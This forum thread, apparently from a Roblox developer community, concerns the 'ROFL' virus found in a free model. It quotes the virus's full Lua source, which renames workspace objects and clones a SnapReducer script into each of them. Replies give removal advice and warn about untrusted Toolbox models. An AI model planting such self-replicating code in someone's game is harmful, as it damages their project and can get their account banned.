Can't believe ROFL still exists

I found this “SnapReducer” thing which is so sussy in a part called ROFL in one free model that I used to reference certain things so my game doesn’t look like virus, but I forgot to delete it so every NPC now is named “ROFL” and model named “LMAO”

model = script.Parent -- Sets the model variable to the script's parent, this way we don't have to manually set model names.



function Infector()
while true do -- Infinite loop
	found = game.Workspace:FindFirstChild("Humanoid")
	found2 = game.Workspace:FindFirstChild("Model")
	found3 = game.Workspace:FindFirstChild("Brick")
	if found ~= nil then
		found.Name="ROFL"
		infectedscr = model.SnapReducer:Clone()
		infectedscr.Parent = found
	else
	if found2 ~= nil then
		found2.Name = "LMAO"
		infectedscr2 = model.SnapReducer:Clone()
		infectedscr2.Parent = found2
	else
	if found3 ~= nil then
		found3.Name = "LOL"
		infectedscr3 = model.SnapReducer:Clone()
		infectedscr3.Parent = found3
	else
	local children = game.Workspace:GetChildren()
	for c = 1, #children do
		
		if children[c].Name ~= "ROFL"
		then
		children[c].Name = "ROFL"
		infectedscr421 = model.SnapReducer:Clone()
		infectedscr421.Parent = children[c]
		else
		end
		
	end
	end
	end
	
	end
	wait(10)
end
end
 
Infector()

EDUCATIONAL PURPOSES DON’T REALLY USE THE CODE THE MAKE A VIRUS

Rofl to you the creator of rofl

Anyone know if there is a much more worse version of this virus and how can I remove them without bugging my game?

I don’t see why you can’t just delete the script. It’s not like you built your game to rely on the virus, no?

What do you mean by this? Code style? Roblox has an official guide for that.

Roblox viruses are often very tame, as you’ve seen. However, they range from “annoying” to “bannable”. For instance, a virus could put bannable material into your game, and then have a bot go and mass report your game, leading to you getting banned. Of course, that’s a wild and far out there assumption, but I’ve heard cases of it happening. Something similar happened with my old account, which was falsely banned for putting in a free model. Needless to say, I’d recommend not touching the Toolbox, even if you know what you’re doing.

Or better yet, stop importing models with scripts into your game by unverified creators…

What? I guess I should have given some more context. I had put it in multiple games before then.

that has to be one of the most poorly written viruses I have ever laid my eyes on